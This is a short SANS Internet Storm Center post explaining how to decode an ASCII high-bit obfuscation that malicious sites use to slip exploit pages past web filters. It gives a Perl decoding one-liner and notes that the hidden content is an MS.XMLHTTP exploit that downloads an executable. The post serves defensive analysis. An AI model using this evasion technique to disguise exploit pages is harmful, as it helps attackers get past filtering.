Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Decoding Diyer’s Ascii bypass: - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Decoding Diyer’s Ascii bypass:
A user wrote in that he was seeing some exploit sites using the ""cooldiyer" ascii encoding for web filtering bypass.
The user’s question was how can I decode these?

Thanks to DanielW another handler we have an answer.
“This one is very straight forward to decode - all you have to do is convert it into 7bit ASCII or clear the highest bit with some Perl-Fu like cat gamefile.htm | perl -pe 's/(.)/chr(ord($1)&127)/ge'.
This is what they do with the HTML line above the code block as well (charset US-ASCII is 7bit). The decoded URL is a plain ordinary MS.XMLHTTP exploit which tries to download svc.exe but this file is no longer there”

I do want to warn users sites using this are mostly BAD sites with malware and exploits on them. Be very careful about any sites you find using this as they could have an exploit for your webbrowser/OS that you have no defenses against.
donald

206 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!